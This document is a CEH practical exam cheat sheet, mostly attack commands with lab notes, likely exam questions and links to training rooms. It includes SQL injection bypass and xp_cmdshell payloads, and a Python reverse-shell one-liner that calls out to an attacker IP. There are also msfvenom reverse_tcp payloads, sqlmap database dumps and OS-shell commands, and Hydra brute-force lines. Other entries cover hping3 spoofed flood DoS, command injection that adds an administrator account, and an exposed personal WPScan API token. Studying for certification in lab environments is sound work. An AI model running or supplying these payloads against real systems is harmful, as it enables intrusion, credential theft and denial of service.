-----------------------------------------------------------------------------

SQL INJECTION

' OR 1=1 -- (;'INSERT INTO LOGIN VALUES ('JOHN','APPLE');--)

';exec master..xp_cmdshell'ping URL -| 65000 -t';--

--------------------------------------------------------------

N-STALKER X

owasp policy

---------------------------------------------------------------

CONSOLE (document.cookie)

SQLMAP (-u url --cookie= --dbs)

HACKING WIRELESS

AIRCRACK-NG

CRYPTOGRAPHY

HASHCALC

CRYPTOFORGE

BCTEXTENCODER

VERACRYPT

CLOUD COMPUTING

BYPASS AV MSFVENOM linux/x86/shell/reverse_tcp -F ELF

SLOWLORIS DoS

MOBILE HACKING

MSFVENOM -L (android/meterpreter/reverse_tcp)

Exam Cheats sheets (3):

My Initial way of approaching Exam/ Vuln CTF Boxes:

netdiscover -i eth0 — This will help me to get the machines available on our network. [ eth0 may differ if VPN network I will be tun0 ]

Once I get the IP’s I will run my Nmap on all those IP’s.

nmap -p- 10.10.10.10 [ Any IP ]

Once I ran the above command I will get all the opened port on that target and then with that open port, I will run another nmap,

for example, if port 443,80,53,135,8080,8888 are opened then my nmap command will be.

4. nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 10.10.10.10

This will find out the OS version, service version, and ran default nmap script and store the output. Storing output is very important, you may need to refer it many times.

5. While nmap is running I will open all the IPs on browser and will see whether any web service is running on not, if Yes then I will run gobuster or dirb.

gobuster -e -u http://10.10.10.10 -w wordlsit.txt

dirb http://10.10.10.10 wordlist.txt

6. If I find any login page I will try SQLi manually

admin' --

admin' #

admin'/*

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1—

7. Brute Forcing services !! and making custom wordlists is always an added advantage but make sure the service won’t be down OR lock you out from trying again.

Some of the default password list:

http://www.phenoelit.org/dpl/dpl.html

https://datarecovery.com/rd/default-passwords/

https://github.com/Dormidera/WordList-Compendium

Making custom wordlist from website keywords:

cewl example.com -m 5 -w words.txt

where cewl is the tool, example.com is the site, -m is to specify the minimum length of the word , -w is to specify the output file

Some of the service brute force with hydra:

hydra -l root -P passwords.txt [-t 32] <IP> ftp

hydra -L usernames.txt -P pass.txt <IP> mysql

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V

hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>

hydra -P common-snmp-community-strings.txt target.com snmp

hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1

hydra -l root -P passwords.txt <IP> ssh

Searchsploit useful commands:

searchsploit “Linux Kernel”

searchsploit -m 7618 — Paste the exploit in the current directory

searchsploit -p 7618[.c] — Show complete path

searchsploit — nmap file.xml — Search vulns inside a Nmap XML result

Exam Cheats sheets (3):

## NMAP

- Scan a single IP `nmap 192.168.1.1`

- Scan a host `nmap www.testhostname.com`

- Scan a range of IPs `nmap 192.168.1.1-20`

- Scan a subnet `nmap 192.168.1.0/24`

- Scan targets from a text file `nmap -iL list-of-ips.txt`

- Scan a single Port `nmap -p 22 192.168.1.1`

- Scan a range of ports `nmap -p 1-100 192.168.1.1`

- Scan 100 most common ports (Fast) `nmap -F 192.168.1.1`

- Scan all 65535 ports `nmap -p- 192.168.1.1`

- Scan using TCP connect `nmap -sT 192.168.1.1`

- Scan using TCP SYN scan (default) `nmap -sS 192.168.1.1`

- Scan UDP ports `nmap -sU -p 123,161,162 192.168.1.1`

- Scan selected ports - ignore discovery `nmap -Pn -F 192.168.1.1`

- Detect OS and Services `nmap -A 192.168.1.1`

- Standard service detection `nmap -sV 192.168.1.1`

- More aggressive Service Detection `nmap -sV --version-intensity 5 192.168.1.1`

- Lighter banner grabbing detection `nmap -sV --version-intensity 0 192.168.1.1`

- Save default output to file `nmap -oN outputfile.txt 192.168.1.1`

- Save results as XML `nmap -oX outputfile.xml 192.168.1.1`

- Save results in a format for grep `nmap -oG outputfile.txt 192.168.1.1`

- Save in all formats `nmap -oA outputfile 192.168.1.1`

- Scan using default safe scripts `nmap -sV -sC 192.168.1.1`

- Get help for a script `nmap --script-help=ssl-heartbleed`

- Scan using a specific NSE script `nmap -sV -p 443 –script=ssl-heartbleed.nse 192.168.1.1`

- Scan with a set of scripts `nmap -sV --script=smb* 192.168.1.1`

- Gather page titles from HTTP services `nmap --script=http-title 192.168.1.0/24`

- Get HTTP headers of web services `nmap --script=http-headers 192.168.1.0/24`

- Find web apps from known paths `nmap --script=http-enum 192.168.1.0/24`

## SQLMAP

- Simple usage `sqlmap -u “https://target_site.com/page/”`

- Automatic GET request parameter `sqlmap -u “https://target_site.com/page?p1=value1&p2=value2”`

- Use POST request `sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2"`

- Request file as input(get it from Burpsuite) `sqlmap -r request.txt`

- Use authenticated session with cookie `sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --cookie="Session_Cookie_Value"`

- Use authenticated session with auth headers `sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"`

- Basic authentication `sqlmap -u “https://target_site.com/page/” --data="p1=value1&p2=value2" --auth-type=basic --auth-cred=username:password`

# Post exploitation(use these if the SQLi vuln is positive)

- List databases `sqlmap -u “https://target_site.com/page?p1=value1” --dbs`

- List tables of TARGET_DB `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --tables`

- List columns of TARGET_TABLE in TARGET_DB `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --columns`

- Dump specific data of columns `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE -C "Col1,Col2" --dump`

- Fully dump table `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB -T TARGET_TABLE --dump`

- Dump the entire database `sqlmap -u “https://target_site.com/page?p1=value1” -D TARGET_DB --dump`

- Custom SQL query `sqlmap -u “https://target_site.com/page?p1=value1” --sql-query "SELECT * FROM TARGET_DB;"`

- Get OS shell `sqlmap -u “https://target_site.com/page?p1=value1” --os-shell`

- Get SQL shell `sqlmap -u “https://target_site.com/page?p1=value1” --sqlmap-shell`

- Use attack techniques `sqlmap -u “https://target_site.com/page?p1=value1” --technique=BEUSTQ`

- B: Boolean-based blind

- E: Error-based

- U: Union query-based

- S: Stacked queries

- T: Time-based blind

- Q: Inline queries

### General purpose command

`sqlmap -u “https://target_site.com/page/”--proxy="http://127.0.0.1:8080/" --cookie=”SESSID=lred0jr6na1vmci;” --data=”p1=value1” -p p1 --level=5 --risk=3 --dbms=mysql --technique=BEUSTQ --force-ssl`

## Telnet enumeration

`telnet 192.168.0.1`

## FTP enumeration

`ftp 192.168.0.1`

## SMB Enumeration

`smbmap -H 192.168.0.1 -R`

`smbclient -L 192.168.0.1`

`smbclient \\\\192.168.0.1\\share`

## RPC Enumeration

`rpcclient -U "" -N 192.168.0.1`

`enumdomusers`

`queryuser <username>`

## RDP Enumeration

`xfreerdp /v:10.129.189.90 /cert:ignore /u:Administrator`

## Shells

"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.23\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

### after obtaining shell

python -c 'ímport pty;pty.spawn("/bin/sh")'

Exam Cheats sheets (4):

**Module 03: Scanning Networks**

**Lab1-Task1: Host discovery**

- **nmap -sn -PR [IP]**

- **-sn:** Disable port scan

- **-PR:** ARP ping scan

- **nmap -sn -PU [IP]**

- **-PU:** UDP ping scan

- **nmap -sn -PE [IP or IP Range]**

- **-PE:** ICMP ECHO ping scan

- **nmap -sn -PP [IP]**

- **-PP:** ICMP timestamp ping scan

- **nmap -sn -PM [IP]**

- **-PM:** ICMP address mask ping scan

- **nmap -sn -PS [IP]**

- **-PS:** TCP SYN Ping scan

- **nmap -sn -PA [IP]**

- **-PA:** TCP ACK Ping scan

- **nmap -sn -PO [IP]**

- **-PO:** IP Protocol Ping scan

**Lab2-Task3: Port and Service Discovery**

- **nmap -sT -v [IP]**

- **-sT:** TCP connect/full open scan

- **-v:** Verbose output

- **nmap -sS -v [IP]**

- **-sS:** Stealth scan/TCP hall-open scan

- **nmap -sX -v [IP]**

- **-sX:** Xmax scan

- **nmap -sM -v [IP]**

- **-sM:** TCP Maimon scan

- **nmap -sA -v [IP]**

- **-sA:** ACK flag probe scan

- **nmap -sU -v [IP]**

- **-sU:** UDP scan

- **nmap -sI -v [IP]**

- **-sI:** IDLE/IPID Header scan

- **nmap -sY -v [IP]**

- **-sY:** SCTP INIT Scan

- **nmap -sZ -v [IP]**

- **-sZ:** SCTP COOKIE ECHO Scan

- **nmap -sV -v [IP]**

- **-sV:** Detect service versions

- **nmap -A -v [IP]**

- **-A:** Aggressive scan

**Lab3-Task2: OS Discovery**

- **nmap -A -v [IP]**

- **-A:** Aggressive scan

- **nmap -O -v [IP]**

- **-O:** OS discovery

- **nmap –script smb-os-discovery.nse [IP]**

- **-–script:** Specify the customized script

- **smb-os-discovery.nse:** Determine the OS, computer name, domain, workgroup, and current time over the SMB protocol (Port 445 or 139)

**Module 04: Enumeration**

**Lab2-Task1: Enumerate SNMP using snmp-check**

- nmap -sU -p 161 [IP]

- **snmp-check [IP]**

**Addition**

- nbtstat -a [IP] (Windows)

- nbtstat -c

**Module 06: System Hacking**

**Lab1-Task1: Perform Active Online Attack to Crack the System's Password using Responder**

- **Linux:**

- cd

- cd Responder

- chmox +x ./Responder.py

- **sudo ./Responder.py -I eth0**

- passwd: \*\*\*\*

- **Windows**

- run

- \\CEH-Tools

- **Linux:**

- Home/Responder/logs/SMB-NTMLv2-SSP-[IP].txt

- sudo snap install john-the-ripper

- passwd: \*\*\*\*

- **sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt**

**Lab3-Task6: Covert Channels using Covert\_TCP**

- **Attacker:**

- cd Desktop

- mkdir Send

- cd Send

- echo "Secret"->message.txt

- Place->Network

- Ctrl+L

- **smb://[IP]**

- Account & Password

- copy and paste covert\_tcp.c

- **cc -o covert\_tcp covert\_tcp.c**

- **Target:**

- **tcpdump -nvvx port 8888 -I lo**

- cd Desktop

- mkdir Receive

- cd Receive

- File->Ctrl+L

- smb://[IP]

- copy and paste covert\_tcp.c

- cc -o covert\_tcp covert\_tcp.c

- **./covert\_tcp -dest 10.10.10.9 -source 10.10.10.13 -source\_port 9999 -dest\_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt**

- **Tcpdump captures no packets**

- **Attacker**

- **./covert\_tcp -dest 10.10.10.9 -source 10.10.10.13 -source\_port 8888 -dest\_port 9999 -file /home/attacker/Desktop/send/message.txt**

- Wireshark (message string being send in individual packet)

**Lab0-Task0: Rainbowcrack and QuickStego**

- Use Winrtgen to generate a rainbow table

- Launch RainbowCrack

- File->Load NTLM Hashes from PWDUMP File

- Rainbow Table->Search Rainbow Table

- Use the generated rainbow table

- RainbowCrack automatically starts to crack the hashes

**Lab 0-Task1: Rainbowcrack and QuickStego**

- Launch QuickStego

- Open Image, and select target .jpg file

- Open Text, and select a txt file

- Hide text, save image file

- Re-launch, Open Image

- Select stego file

- Hidden text shows up

**Module 08: Sniffing**

**Lab2-Task1: Password Sniffing using Wireshark**

- **Attacker**

- Wireshark

- **Target**

- [www.moviescope.com](http://www.moviescope.com/)

- Login

- **Attacker**

- Stop capture

- File-\>Save as

- Filter: **http.request.method==POST**

- RDP log in Target

- service

- start Remote Packet Capture Protocol v.0 (experimental)

- Log off Target

- Wireshark-\>Capture options-\>Manage Interface-\>Remote Interfaces

- Add a remote host and its interface

- Fill info

- **Target**

- Log in

- Browse website and log in

- **Attacker**

- Get packets

**Module 10: Denial-of-Service**

**Lab1-Task2: Perform a DoS Attack on a Target Host using hping3**

- **Target:**

- Wireshark-\>Ethernet

- **Attacker**

- **hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood**

- **-S: Set the SYN flag**

- **-a: Spoof the IP address**

- **-p: Specify the destination port**

- **--flood: Send a huge number of packets**

- **Target**

- Check wireshark

- **Attacker (Perform PoD)**

- **hping3 -d 65538 -S -p 21 –flood [Target IP]**

- **-d: Specify data size**

- **-S: Set the SYN flag**

- **Attacker (Perform UDP application layer flood attack)**

- nmap -p 139 10.10.10.19 (check service)

- **hping3 -2 -p 139 –flood [IP]**

- **-2: Specify UDP mode**

- **Other UDP-based applications and their ports**

- CharGen UDP Port 19

- SNMPv2 UDP Port 161

- QOTD UDP Port 17

- RPC UDP Port 135

- SSDP UDP Port 1900

- CLDAP UDP Port 389

- TFTP UDP Port 69

- NetBIOS UDP Port 137,138,139

- NTP UDP Port 123

- Quake Network Protocol UDP Port 26000

- VoIP UDP Port 5060

**Module 13: Hacking Web Servers**

**Lab2-Task1: Crack FTP Credentials using a Dictionary Attack**

- nmap -p 21 [IP]

- **hydra -L usernames.txt -P passwords.txt ftp://10.10.10.10**

**Module 14: Hacking Web Applications**

**Lab2-Task1: Perform a Brute-force Attack using Burp Suite**

- Set proxy for browser: 127.0.0.1:8080

- Burpsuite

- Type random credentials

- capture the request, right click-\>send to Intrucder

- Intruder-\>Positions

- Clear $

- Attack type: Cluster bomb

- select account and password value, Add $

- Payloads: Load wordlist file for set 1 and set 2

- start attack

- **filter status==302**

- open the raw, get the credentials

- recover proxy settings

**Lab2-Task3: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications**

- Log in a website, change the parameter value (id )in the URL

- Conduct a XSS attack: Submit script codes via text area

**Lab2-Task5: Enumerate and Hack a Web Application using WPScan and Metasploit**

- **wpscan --api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads --url** **http://10.10.10.16:8080/CEH** **--plugins-detection aggressive --enumerate u**

- **--enumerate u: Specify the enumeration of users**

- **API Token: Register at** [**https://wpscan.com/register**](https://wpscan.com/register)

- **Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads**

- service postgresql start

- msfconsole

- **use auxiliary/scanner/http/wordpress\_login\_enum**

- show options

- **set PASS\_FILE password.txt**

- **set RHOST 10.10.10.16**

- **set RPORT 8080**

- **set TARGETURI** **http://10.10.10.16:8080/CEH**

- **set USERNAME admin**

- run

- Find the credential

**Lab2-Task6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level security)**

- If found command injection vulnerability in an input textfield

- | hostname

- | whoami

- **| tasklist| Taskkill /PID /F**

- **/PID: Process ID value od the process**

- **/F: Forcefully terminate the process**

- | dir C:\

- **| net user**

- **| net user user001 /Add**

- **| net user user001**

- **| net localgroup Administrators user001 /Add**

- Use created account user001 to log in remotely

**Module 15: SQL Injection**

**Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap**

- Login a website

- Inspect element

- Dev tools-\>Console: document.cookie

- **sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" –dbs**

- **-u: Specify the target URL**

- **--cookie: Specify the HTTP cookie header value**

- **--dbs: Enumerate DBMS databases**

- Get a list of databases

- Select a database to extract its tables

- **sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope –tables**

- **-D: Specify the DBMS database to enumerate**

- **--tables: Enumerate DBMS database tables**

- Get a list of tables

- Select a column

- **sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope –T User\_Login --dump**

- Get table data of this column

- **sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" --os-shell**

- Get the OS Shell

- TASKLIST

**Module 20: Cryptography**

**Lab1-Task2: Calculate MD5 Hashes using MD5 Calculator**

- Nothing special

**Lab4-Task1: Perform Disk Encryption using VeraCrypt**

- Click VeraCrypt

- Create Volumn

- Create an encrypted file container

- Specify a path and file name

- Set password

- Select NAT

- Move the mouse randomly for some seconds, and click Format

- Exit

- Select a drive, select file, open, mount

- Input password

- Dismount

- Exit

**Module Appendix: Covered Tools**

- **Nmap**

- Multiple Labs

- **Hydra**

- Module 13: Lab2-Task1

- **Sqlmap**

- Module 15: Lab1-Task2

- **WPScan**

- Module 14: Lab2-Task5

- wpscan –-url http://10.10.10.10 -t 50 -U admin -P rockyou.txt

- **Nikto**

- [https://zhuanlan.zhihu.com/p/124246499](https://zhuanlan.zhihu.com/p/124246499%20)

- **John**

- Module 06: Lab1-Task1

- **Hashcat**

- **Crack MD5 passwords with a wordlist:**

- hashcat hash.txt -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

- **Crack MD5 passwords in a certain format:**

- hashcat -m 0 -a 3 ./hash.txt 'SKY-HQNT-?d?d?d?d'

- [https://xz.aliyun.com/t/4008](https://xz.aliyun.com/t/4008)

- [https://tools.kali.org/password-attacks/hashcat](https://tools.kali.org/password-attacks/hashcat)

- **Metasploit**

- Module 14: Lab2-Task5

- **Responder LLMNR**

- Module 06: Lab1-Task1

- **Wireshark or Tcpdump**

- Multiple Labs

- **Steghide**

- **Hide**

- steghide embed -cf [img file] -ef [file to be hide]

- steghide embed -cf 1.jpg -ef 1.txt

- Enter password or skip

- **Extract**

- steghide info 1.jpg

- steghide extract -sf 1.jpg

- Enter password if it does exist

- **OpenStego**

- [https://www.openstego.com/](https://www.openstego.com/)

- **QuickStego**

- Module 06: Lab0-Task1

- **Dirb (Web content scanner)**

- [https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c86](https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c86)

- [https://blog.csdn.net/weixin\_44912169/article/details/105655195](https://blog.csdn.net/weixin_44912169/article/details/105655195)

- **Searchsploit (Exploit-DB)**

- [https://www.hackingarticles.in/comprehensive-guide-on-searchsploit/](https://www.hackingarticles.in/comprehensive-guide-on-searchsploit/)

- **Crunch (wordlist generator)**

- [https://www.cnblogs.com/wpjamer/p/9913380.html](https://www.cnblogs.com/wpjamer/p/9913380.html)

- **Cewl (URL spider)**

-[https://www.freebuf.com/articles/network/190128.html](https://www.freebuf.com/articles/network/190128.html)

- **Veracrypt**

- Module 20: Lab4-Task1

- **Hashcalc**

- Module 20: Lab1-Task1 (Nothing special)

- **Rainbow Crack**

- Module 06: Lab0-Task0

- **Windows SMB**

- smbclient -L [IP]

- smbclient \\ip\\sharename

- nmap -p 445 -sV –script smb-enum-services [IP]

- **Run Nmap at the beginning **

- nmap -sn -PR 192.168.1.1/24 -oN ip.txt

- nmap -A -T4 -vv -iL ip.txt -oN nmap.txt

- nmap -sU -sV -A -T4 -v -oN udp.txt

Exam Questions:

How many Machines are active? Use netdiscover
Which Machine has FTP Server open? Use nmap
Find 2 secret files using FTP? brute force FTP usernames
Find out phone number of Web application user? Use sqlmap
Brute Force Wordpress website User's Password? --> Use wpscan
Decode .hex file?--> Use Cryptool
Which Machine started DOS attack? DDOS attack happened on which IP? Find out http Credentials from PCAP file? Use Wireshark to check PCAP file.
Decode the given text using given secret? Use BCTextEncoder
Calculate SHAI hash of a text? Use Hashcalc
Decrypt the hidden Volume and find secret file?--> Use Veracrypt
Crack the given hash?--> Use hashes.com
Find Secret hidden in the Image/File?--> Use OpenStego/Snow
Find a Secret file in Android?--> Use ADB
Send data to another machine(firewall blocked)?--> Use Covert TCP
What is the IP of the Windows X machine?
What is the version of the Linux Kernel?
How many Windows machines are there?
What is the password for user X of the FTP server?
What is user X's IBAN number?
Which user X's phone number?
What is the password hidden in the .jpeg file?
Find the IP address of the machine which is running the RDP?
Find the OS name of the machine which is running MySQL database?
Find the HTTP method that poses a high risk to the application example.com?
Find the Phone number the employee?
Find the file name which is tampered by comparing the hashes which is given in the /hashes folder?
Decrypt the volume file using veracrypt?
Connect to the Server remotely using the credentials give by RDP?
Decode the file which is encoded in DES(ECB) format?
Find the password of the wordpress user “Raj”?
Find the attacker IP address who has launched the DOS attack?
Find the number of machines that were used to iniate the DDOS attack?
Find the username/password from the pcap file, which is in plain text?
Extract the information from the SDcard of the Android User?
Sql injection using sqlmap: u need to perform sql injection attack using sqlmap and need to extract password of specific user.
You need to check which hosts have rdp enabled. For this u need to perform the port scan on 3389 and then os discovery on open port host and u need to get os of that rdp enabled host.
U need to check the mysql service running on which host. Same question 2 technique you need to perform.
U need to extract username and password of ftp ( hydra tool u need to use and need to use wordlist placed in desktop wordlist folder)
U need to get the password.txt file using veracrypt (disk encryption)
U need to get the username and password using wireshark.
U need to check bit 3 is true or not using wireshark
U need to check the traffic from which port to which port is moving using wireshark
U need to decrypt the 3des encryption using cryptool.
U need to extract the pin using opensteg
U need to perform steganalysis on the txt file using snow tool
U need to perform brute force on the website using burpsuite ( using intruder)
U need to crack hash file using john ( the hash file is located in the responder tool logs file)
U need to find the flag file from the ftp. ( for this task bro please use the credentials u cracked in previous challenge)
Perform remote os command injection (dvwa web) and need to get the content from pin file
Perform file upload (dvwa web)
U need to compare the hashes using md5 and provide results which file is tampered.
Need to crack hash file ( john the ripper)
U need to find trojan and need to provide the port of the trojan
U need to perform the parameter tampering
What is the IP of the Windows X machine?
What is the version of the Linux Kernel?
How many Windows machines are there?
What is the password for user X of the FTP server?
What is user X's IBAN number?
Which user X's phone number?
What is the password hidden in the .jpeg file?
Demonstrate the understanding of attack vectors.
Find service and detect the OS?
What is the password for user X of the FTP server?
Which user X's phone number?
What is the password hidden in the .jpeg file?
What is the hidden message in the .txt file?
Find X from .pcap file
Crack X user hash
Perform network scanning to identify live and vulnerable machines in a network.
Perform OS banner grabbing, service, and user enumeration.
Perform system hacking, steganography, steganalysis attacks, and cover tracks.
Identify and use viruses, computer worms, and malware to exploit systems.
Perform packet sniffing.
Conduct a variety of web server and web application attacks including directory traversal, parameter tampering, XSS, etc.
Perform SQL injection attacks.
Perform different types of cryptography attacks.
Perform vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems etc.
Vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems, etc;
System hacking, steganography;
Network scanning to identify live and vulnerable machines in a network;
OS banner grabbing, service, and user enumeration;
Different types of cryptography attacks;
SQL injection attacks;
Packet sniffing;

Good Resources:

Gem Resources:

https://github.com/cmuppin/CEH

TryHackMe Rooms

SQL Injection labs:-

https://tryhackme.com/room/dailybugle

https://tryhackme.com/room/revenge

File Uploading Vulnerability to RCE Video:-

https://www.youtube.com/watch?v=OZ9Bo6Ipojw

Command Injection labs:-

https://portswigger.net/web-security/os-command-injection

IDOR labs:-

https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references

Must Practice:-

https://tryhackme.com/room/owaspjuiceshop

CEH-Practical-Guide:-

https://github.com/CyberSecurityUP/Guide-CEH-Practical-Master

ILabs videos:-

https://www.youtube.com/watch?v=b2YrqpeklFw&list=PLrrgFyE6PtlaCixUxJPM0Y9Peye6iCewH&index=18

Repo For Notes:-

https://blog.adithyanak.com/ceh-practical-notes

https://github.com/ziyishen97/CEH-v11-Practical/blob/main/Practical%20Exam%20Notes.md

Wireshark labs:-

https://tryhackme.com/room/overpass2hacked

https://tryhackme.com/room/smaggrotto

https://tryhackme.com/room/h4cked

https://tryhackme.com/room/tshark

https://shishirsubedi.com.np/thm/misguided_ghosts/

Hydra labs:-

https://tryhackme.com/room/hydra

Cracking labs:-

https://tryhackme.com/room/crackthehash

https://tryhackme.com/room/crackthehashlevel2

Cryptography:-

https://www.hackthebox.eu/home/challenges/Crypto

Steganography:-

https://www.hackthebox.eu/home/challenges/Stego

Brutforce:-

https://www.youtube.com/watch?v=fdb3U2EFLzo

https://tryhackme.com/room/linuxfundamentalspart1

https://tryhackme.com/room/crackthehash

https://tryhackme.com/room/basicpentestingjt

https://tryhackme.com/room/sqlmap

https://tryhackme.com/room/dvwa

https://tryhackme.com/room/ice

https://tryhackme.com/room/windowsfundamentals1xbx

https://tryhackme.com/room/cryptographyfordummies

https://tryhackme.com/module/linux-fundamentals

https://tryhackme.com/module/introduction-to-offensive-pentesting

https://tryhackme.com/module/windows-fundamentals

https://tryhackme.com/room/furthernmap

https://tryhackme.com/room/nmap03

https://tryhackme.com/room/nmap04

https://tryhackme.com/room/johntheripper0

https://tryhackme.com/room/hydra

https://tryhackme.com/room/crackthehash

https://tryhackme.com/room/crackthehashlevel2

https://tryhackme.com/room/ccstego

https://tryhackme.com/room/introtonetworking

https://tryhackme.com/room/protocolsandservers

https://tryhackme.com/room/protocolsandservers2

https://tryhackme.com/room/wireshark

https://tryhackme.com/room/owasptop10

https://tryhackme.com/room/learnowaspzap

https://tryhackme.com/room/introtoshells

https://tryhackme.com/room/pentestingfundamentals

https://tryhackme.com/room/rpmetasploit

https://tryhackme.com/room/easypeasyctf

Tools:-

https://lnkd.in/gvExZAk

https://lnkd.in/gFd7C-c

https://lnkd.in/guZsBtX

https://lnkd.in/gQDithi

https://lnkd.in/gSaZTcF

https://lnkd.in/gRFivzZ

https://lnkd.in/gnBZ8N2

https://lnkd.in/gXH5qDX

https://lnkd.in/g7x59qP

Challenge rooms:-

https://lnkd.in/gFYnaTz